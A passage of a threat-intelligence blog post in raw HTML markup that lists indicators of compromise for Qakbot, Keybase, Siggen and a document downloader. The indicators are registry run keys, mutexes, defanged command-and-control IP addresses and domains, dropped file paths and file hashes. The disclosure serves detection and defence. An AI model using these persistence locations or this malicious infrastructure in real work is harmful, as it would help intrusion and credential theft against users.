/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-OzV24rJ6BoI/WTrX_xk0c_I/AAAAAAAABD4/FUWHIt5UBDoLVceq7rM-RDJO1dg4FFLJACLcB/s1600/wxanalytics.ru_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="558" data-original-width="1112" height="200" src="https://3.bp.blogspot.com/-OzV24rJ6BoI/WTrX_xk0c_I/AAAAAAAABD4/FUWHIt5UBDoLVceq7rM-RDJO1dg4FFLJACLcB/s400/wxanalytics.ru_umbrella.png" 
width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-KIbjWEE9Urg/WTrYEeJTpaI/AAAAAAAABD8/G1UAKSmNHvkTYsX47FmVPVKgGP8z8JPFgCLcB/s1600/093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6_malware.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="300" src="https://1.bp.blogspot.com/-KIbjWEE9Urg/WTrYEeJTpaI/AAAAAAAABD8/G1UAKSmNHvkTYsX47FmVPVKgGP8z8JPFgCLcB/s400/093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6_malware.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Qakbot-6327689-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;kddds&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyOverride&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\DBRNOCX&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisplayName&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;wawrtxtguelkunm&lt;/li&gt;&lt;li&gt;\BaseNamedObjects\Global\uhtvtft&lt;/li&gt;&lt;li&gt;eioigs&lt;/li&gt;&lt;li&gt;\BaseNamedObjects\Global\ubrjqsxr&lt;/li&gt;&lt;li&gt;knsoonoa&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP 
Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;204[.]79[.]197[.]200&lt;/li&gt;&lt;li&gt;104[.]254[.]150[.]79&lt;/li&gt;&lt;li&gt;52[.]27[.]10[.]213&lt;/li&gt;&lt;li&gt;64[.]95[.]32[.]24&lt;/li&gt;&lt;li&gt;64[.]95[.]32[.]20&lt;/li&gt;&lt;li&gt;107[.]21[.]249[.]100&lt;/li&gt;&lt;li&gt;104[.]16[.]32[.]229&lt;/li&gt;&lt;li&gt;54[.]197[.]40[.]33&lt;/li&gt;&lt;li&gt;54[.]225[.]186[.]185&lt;/li&gt;&lt;li&gt;162[.]144[.]12[.]241&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;jdlunsnxplknfahqhhcnydvjm[.]net&lt;/li&gt;&lt;li&gt;bofznergcfar[.]biz&lt;/li&gt;&lt;li&gt;yfptiliaesndlcvuemywsvcyh[.]info&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\Microsoft\Knsoono\knsoon.dll&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9&lt;/li&gt;&lt;li&gt;0452810a21fc1207dc11a2a82127f30354fdc41aef95371b77a00b5592c11bb4&lt;/li&gt;&lt;li&gt;02ad78b356cb9723b18122a2fad033e0487be7e367864d7481371bde0b0b8acf&lt;/li&gt;&lt;li&gt;0200b37385ee4b54572e9ff8f9dca6b20ef6a41feefeb9f5eaf14fa35fe82b87&lt;/li&gt;&lt;li&gt;007f9ee2441329fe8c8ebf6f597c84eb1e4fea764dd228cfae9bed400c8af53b&lt;/li&gt;&lt;li&gt;006b191a135afecf86bd4df2fbf619f8f019ab316d2edb33d053209384c7d4cd&lt;/li&gt;&lt;li&gt;00141f6303dd960c61a4fdb06e686ccc972c0e0f092adaf823444e4b7e32ae09&lt;/li&gt;&lt;li&gt;d52f95bb330930af7477604547dd33fdf3fe76e20301a67a7d490f6b1ebe5247&lt;/li&gt;&lt;li&gt;4712cf80102b7886a946ab6454fb0978f9d94feacd52c5df18850dbefa0158ec&lt;/li&gt;&lt;li&gt;5b7a5a58e4af312cd23e1f28597f2818953dd23abdeedb52adb882958e2766cb&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" imageanchor="1" style="margin-left: 1em; 
margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-DJlz0AF129c/WTrYPGlFfxI/AAAAAAAABEA/TJrbbknZhz4nmD-PkZhb1bJY0MsqTqd_gCLcB/s1600/9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-DJlz0AF129c/WTrYPGlFfxI/AAAAAAAABEA/TJrbbknZhz4nmD-PkZhb1bJY0MsqTqd_gCLcB/s400/9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-hUgePS_jE3k/WTrYTlqEjxI/AAAAAAAABEE/Tb2-9t0i_YA3D4FfbqohtZjP97UKMDgcwCLcB/s1600/9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="471" data-original-width="1237" height="151" src="https://1.bp.blogspot.com/-hUgePS_jE3k/WTrYTlqEjxI/AAAAAAAABEE/Tb2-9t0i_YA3D4FfbqohtZjP97UKMDgcwCLcB/s400/9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Doc.Downloader.Generic-6327950-1&lt;/h3&gt;&lt;h4&gt;Indicators of 
Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyOverride&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyEnable&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00002109F100C0400000000000F01FEC\USAGE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;SpellingAndGrammarFiles_1036&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyBypass&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00002109F100A0C00000000000F01FEC\USAGE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;SpellingAndGrammarFiles_3082&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00002109F10090400000000000F01FEC\USAGE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;SpellingAndGrammarFiles_1033&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;AutoConfigURL&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\CRYPTOGRAPHY\RNG&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Seed&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET 
SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyServer&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\Shared Tools\Panose&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\RECENTDOCS\.docm&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;_!SHMSFTHISTORY!_&lt;/li&gt;&lt;li&gt;Local\ZonesCounterMutex&lt;/li&gt;&lt;li&gt;Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012017052920170530!&lt;/li&gt;&lt;li&gt;CTF.Compart.MutexDefaultS-1-5-21-1202660629-583907252-1801674531-500&lt;/li&gt;&lt;li&gt;Local\MU_ACBPIDS09_S-1-5-5-0-35459&lt;/li&gt;&lt;li&gt;Local\!IETld!Mutex&lt;/li&gt;&lt;li&gt;Local\_!MSFTHISTORY!_&lt;/li&gt;&lt;li&gt;CTF.LBES.MutexDefaultS-1-5-21-1202660629-583907252-1801674531-500&lt;/li&gt;&lt;li&gt;Global\MTX_MSO_AdHoc1_S-1-5-21-1202660629-583907252-1801674531-500&lt;/li&gt;&lt;li&gt;Local\WininetProxyRegistryMutex&lt;/li&gt;&lt;li&gt;CTF.TimListCache.FMPDefaultS-1-5-21-1202660629-583907252-1801674531-500MUTEX.DefaultS-1-5-21-1202660629-583907252-1801674531-500&lt;/li&gt;&lt;li&gt;Local\WininetConnectionMutex&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;74[.]208[.]222[.]23&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;accotaxs[.]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\TEMP\~$e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb.docm&lt;/li&gt;&lt;li&gt;%System32%\config\WindowsPowerShell.evt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local 
Settings\Temp\bbbababfcecbfa523.txt&lt;/li&gt;&lt;li&gt;\TEMP\27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb.docm&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\bbffdeafaccece.txt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Desktop\d37e.exe&lt;/li&gt;&lt;li&gt;%SystemDrive%\~$runme.docx&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\12tedsgsas124.txt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\tedsgsas124.txt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\eccbfaffbbb.txt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\bbbababfcecbfa.txt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\MRMBYDAX\gate[1].htm&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb&lt;/li&gt;&lt;li&gt;078de2765221c2d5b5030bdd1d7adaa066dd4fc6a6575111df76ec7dd3785bfd&lt;/li&gt;&lt;li&gt;5239d220d79e36af270a89d0683f6744f2b823c18880aa7fe02bc004c52f78ec&lt;/li&gt;&lt;li&gt;ab2ffad0977dda99a85c12d97fa40a8c09d5b81d08f7323e9e70e408ef017f3b&lt;/li&gt;&lt;li&gt;c94d3f6f98fea91c7ff34920cbed45f800e6062706a7192ed6f354c96c669e4b&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br 
/&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-0roBbKbGlKc/WTrdDWKzCYI/AAAAAAAABE8/yvDB8YS-qb0ogKYDg64xvXM-E6MILJcOwCLcB/s1600/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-0roBbKbGlKc/WTrdDWKzCYI/AAAAAAAABE8/yvDB8YS-qb0ogKYDg64xvXM-E6MILJcOwCLcB/s400/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-H4JUbTdZAIU/WTrdJ7l9rpI/AAAAAAAABFA/-wVWvcDJggM-ev-azRbCWLGRcSCTy9ARgCLcB/s1600/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1017" data-original-width="1237" height="328" src="https://4.bp.blogspot.com/-H4JUbTdZAIU/WTrdJ7l9rpI/AAAAAAAABFA/-wVWvcDJggM-ev-azRbCWLGRcSCTy9ARgCLcB/s400/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/--gRngONMW98/WTrdQ0iAbQI/AAAAAAAABFE/_IjW98CcL0QaHjALVlYsMRYFk1eGQ6apwCLcB/s1600/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="342" data-original-width="1112" height="122" src="https://2.bp.blogspot.com/--gRngONMW98/WTrdQ0iAbQI/AAAAAAAABFE/_IjW98CcL0QaHjALVlYsMRYFk1eGQ6apwCLcB/s400/27e9214f2ae3380bf01724f704d58f3b9284dcc9522d9750ac770d49594901fb_umbrella.png" width="400" 
/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Keybase-6328970-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;217[.]174[.]148[.]65&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\Important.exe&lt;/li&gt;&lt;li&gt;%AppData%\Browsers.txt&lt;/li&gt;&lt;li&gt;%AppData%\Mails.txt&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24&lt;/li&gt;&lt;li&gt;8b1c64f993778c52906b8170cc6c16a07f4116e23661956a738323aca7b12c3a&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-blOMf7jFl3Y/WTrZ0kJB_xI/AAAAAAAABEU/1SfQORHFrt8Bu5hjzu3xliTfsbOiLYcqQCLcB/s1600/7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" 
src="https://4.bp.blogspot.com/-blOMf7jFl3Y/WTrZ0kJB_xI/AAAAAAAABEU/1SfQORHFrt8Bu5hjzu3xliTfsbOiLYcqQCLcB/s400/7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-8nKYKzymnIk/WTrZ-AKkuSI/AAAAAAAABEY/Sy0WwRVXimQkgKHK3K1pjsupFXHJi6NgQCLcB/s1600/7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="810" data-original-width="1212" height="266" src="https://1.bp.blogspot.com/-8nKYKzymnIk/WTrZ-AKkuSI/AAAAAAAABEY/Sy0WwRVXimQkgKHK3K1pjsupFXHJi6NgQCLcB/s400/7d22f93bea6e24c11497a826e692216861bb5710e0e6a9842ed9c30463a11b24_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-jlVW741pWo4/WTraD01HVLI/AAAAAAAABEc/wQVJGZ7cGRUyS5r4opcYfJz-5cR71iXhwCLcB/s1600/217.174.148.65_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="600" data-original-width="1092" height="218" src="https://1.bp.blogspot.com/-jlVW741pWo4/WTraD01HVLI/AAAAAAAABEc/wQVJGZ7cGRUyS5r4opcYfJz-5cR71iXhwCLcB/s400/217.174.148.65_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Siggen-6261194-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Collection&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Local\MSCTF.Asm.MutexDefault1&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nsrD.tmp&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;76cac7eac498813164dcb94ed0812163bc4d261ef80232ec528aa941e0622479&lt;/li&gt;&lt;li&gt;2dd6b33d9e07c68b79b6674e0972f28ee316548c5e53b28331d88c739d1a5b8f&lt;/li&gt;&lt;li&gt;87701e501b48b94e9494bbda3f42a8b2a92a0e19d51d3e6023efae30b86f74a0&lt;/li&gt;&lt;li&gt;4a1b26fd16f985e1da3f1b5619b55f6170584ac51923bd6d6c4c455fc86d44da&lt;/li&gt;&lt;li&gt;f20ef69203c8bd06da68071ccf38001fcd411de5c951bb38bb46a15e6d205458&lt;/li&gt;&lt;li&gt;74a306f136aa3b098fe99f6e35a1163d808c996e7ca6f8cd03fc69ec0a2573c0&lt;/li&gt;&lt;li&gt;8998b35cd76f170e62275661c0f0256883ec2b8e34b9e5ff9530c9da4d07fb74&lt;/li&gt;&lt;li&gt;dd249e28e052a2e7747886a0596e7faf7e447fbef7260198509fc6e08c294bbb&lt;/li&gt;&lt;li&gt;745d8d433cba5315749dc61810d9bf4eb1864fb9737c4a2fc3718eda75917d6f&lt;/li&gt;&lt;li&gt;5527923be2a750415d9565fcfc38550bf292206cee0e415278e8e08d3f3cdbdc&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" 
src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-TaoaIfZ3SBU/WTrbx6GHJ_I/AAAAAAAABEs/GKP6EVO5DdAdiKG-ipbkndtiU1XEjoeaACLcB/s1600/Win_Trojan_Siggen_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="422" data-original-width="608" height="277" src="https://4.bp.blogspot.com/-TaoaIfZ3SBU/WTrbx6GHJ_I/AAAAAAAABEs/GKP6EVO5DdAdiKG-ipbkndtiU1XEjoeaACLcB/s400/Win_Trojan_Siggen_amp.png" width="400" 